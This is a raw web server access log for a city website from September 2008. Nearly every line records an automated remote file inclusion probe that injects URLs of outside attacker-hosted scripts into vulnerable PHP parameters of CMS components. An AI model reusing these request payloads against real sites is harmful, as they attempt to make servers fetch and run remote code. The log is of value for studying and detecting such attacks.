212.227.165.161 - - [01/Sep/2008:03:52:42 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://danieledm.altervista.org/PhP/id_osirys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
212.95.41.98 - - [01/Sep/2008:03:54:45 -0700] "GET /errors.php?error=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:03:55:03 -0700] "GET /logs/errors.php?error=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:03:55:03 -0700] "GET /errors.php?error=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
83.246.118.249 - - [01/Sep/2008:03:55:53 -0700] "GET /errors.php?error=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:03:57:11 -0700] "GET //config/dbutil.bck.php?confdir=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:03:58:00 -0700] "GET /logs/access_080330.log/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:03:58:00 -0700] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:03:58:00 -0700] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:03:58:28 -0700] "GET /logs/access_080330.log/errors.php?error=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:03:58:28 -0700] "GET /errors.php?error=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:03:58:29 -0700] "GET /logs/errors.php?error=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
219.142.121.41 - - [01/Sep/2008:03:59:53 -0700] "GET /logs/access_080601.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ahrens-kind.de/cms/css/deal.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:04:00:27 -0700] "GET /logs/access_071231.log/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:04:00:41 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:04:00:45 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:04:01:26 -0700] "GET /logs/access_071231.log/errors.php?error=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:04:01:44 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:04:01:45 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
212.95.41.98 - - [01/Sep/2008:04:04:36 -0700] "GET /logs/access_071231.log/errors.php?error=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
212.95.41.98 - - [01/Sep/2008:04:04:36 -0700] "GET /errors.php?error=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
212.95.41.98 - - [01/Sep/2008:04:04:37 -0700] "GET /logs/errors.php?error=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
83.246.118.249 - - [01/Sep/2008:04:04:53 -0700] "GET /logs/access_071231.log/errors.php?error=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.246.118.249 - - [01/Sep/2008:04:04:53 -0700] "GET /errors.php?error=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.246.118.249 - - [01/Sep/2008:04:04:54 -0700] "GET /logs/errors.php?error=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:04:05:15 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:04:05:15 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:04:05:29 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
83.246.118.249 - - [01/Sep/2008:04:08:02 -0700] "GET /logs/access_080201.log/errors.php?error=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:04:08:11 -0700] "GET //config/dbutil.bck.php?confdir=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
212.95.41.98 - - [01/Sep/2008:04:08:25 -0700] "GET /logs/access_080201.log/errors.php?error=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:04:09:03 -0700] "GET /logs/access_080401.log//login.php?dir=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:04:09:03 -0700] "GET //login.php?dir=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:04:09:03 -0700] "GET /logs//login.php?dir=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:04:09:36 -0700] "GET /logs/access_080201.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:04:09:36 -0700] "GET /logs/access_080201.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:04:10:44 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:04:10:45 -0700] "GET //config/dbutil.bck.php?confdir=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:04:10:45 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:04:11:08 -0700] "GET /logs/access_080201.log//login.php?dir=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:04:11:12 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:04:11:39 -0700] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:04:11:39 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
89.186.1.54 - - [01/Sep/2008:04:11:40 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ploplop123.x10hosting.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:04:11:40 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:04:11:55 -0700] "GET /logs/access.log/errors.php?error=http://sajt.ba/test/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:04:11:57 -0700] "GET /errors.php?error=http://sajt.ba/test/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:04:11:58 -0700] "GET /logs/errors.php?error=http://sajt.ba/test/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "cityofarkadelphia.com"
89.108.67.220 - - [01/Sep/2008:04:18:54 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://peru.americautos.com/images/v2-id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "cityofarkadelphia.com"
89.108.67.220 - - [01/Sep/2008:04:18:54 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://peru.americautos.com/images/v2-id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:04:18:56 -0700] "GET /logs/access.log/errors.php?error=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:04:18:57 -0700] "GET /errors.php?error=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:04:18:57 -0700] "GET /logs/errors.php?error=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:04:19:30 -0700] "GET /logs/access.log//index.php?menu=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:04:19:31 -0700] "GET //index.php?menu=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:04:19:31 -0700] "GET /logs//index.php?menu=http://peru.americautos.com/images/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:04:22:11 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:04:22:12 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:04:22:45 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:04:23:46 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:04:23:46 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:04:23:47 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
64.22.100.83 - - [01/Sep/2008:04:24:09 -0700] "GET /logs/access.log/?p=http://acc-advertising.com/img/originid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
64.22.100.83 - - [01/Sep/2008:04:24:14 -0700] "GET /?p=http://acc-advertising.com/img/originid.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
64.22.100.83 - - [01/Sep/2008:04:24:14 -0700] "GET /logs/?p=http://acc-advertising.com/img/originid.txt??? HTTP/1.1" 200 4084 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:04:24:31 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:04:26:17 -0700] "GET //poll/booth.php?include_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:04:26:21 -0700] "GET /logs//poll/booth.php?include_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
64.22.100.83 - - [01/Sep/2008:04:26:26 -0700] "GET /logs/access.log%20/?p=http://acc-advertising.com/img/originid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:04:26:30 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:04:33:12 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:04:33:12 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:04:35:09 -0700] "GET /logs/access.log//components/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:04:35:23 -0700] "GET /logs/access.log//components/errors.php?error=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
193.200.173.5 - - [01/Sep/2008:04:39:37 -0700] "GET /index.php?body=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "cityofarkadelphia.com"
193.200.173.5 - - [01/Sep/2008:04:39:37 -0700] "GET /logs/index.php?body=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:04:46:39 -0700] "GET /logs/access.log//components/errors.php?error=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:04:48:23 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:04:48:23 -0700] "GET //config/dbutil.bck.php?confdir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:04:48:23 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:04:48:52 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:04:49:17 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:04:49:18 -0700] "GET //config/dbutil.bck.php?confdir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:04:49:18 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
88.244.46.4 - - [01/Sep/2008:04:49:20 -0700] "GET /logs/access_080301.log HTTP/1.1" 200 327680 "http://search.yahoo.com/search?p=%22com_neoreferences%22&ei=UTF-8&fr=yfp-t-305&xargs=0&pstart=1&b=111&xa=7DtOYXVMj6jNQgucPyuCTQ--,1220356029" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:04:49:50 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:04:51:47 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:04:51:47 -0700] "GET //config/dbutil.bck.php?confdir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:04:51:47 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:04:52:25 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:04:53:05 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:04:53:05 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:04:53:05 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:04:53:30 -0700] "GET /logs/access_080201.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:04:53:35 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:04:53:35 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:04:53:35 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
74.53.98.146 - - [01/Sep/2008:04:53:36 -0700] "GET /logs/access_080330.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:04:53:49 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:04:53:57 -0700] "GET ///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:04:54:00 -0700] "GET /logs///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:04:54:01 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:04:54:01 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:04:54:01 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
207.210.89.58 - - [01/Sep/2008:04:54:35 -0700] "GET /logs/access_080330.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
69.16.217.88 - - [01/Sep/2008:04:55:03 -0700] "GET /logs/access_080330.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
88.151.100.136 - - [01/Sep/2008:04:55:30 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "cityofarkadelphia.com"
88.151.100.136 - - [01/Sep/2008:04:55:35 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:04:57:28 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:04:57:28 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:04:57:28 -0700] "GET //config/dbutil.bck.php?confdir=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
91.151.89.176 - - [01/Sep/2008:04:57:34 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "cityofarkadelphia.com"
91.151.89.176 - - [01/Sep/2008:04:57:34 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:04:58:02 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:04:59:18 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:04:59:19 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:05:00:58 -0700] "GET /logs/access.log//bemarket/postscript/postscript.php?p_mode=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:05:00:58 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:05:00:58 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
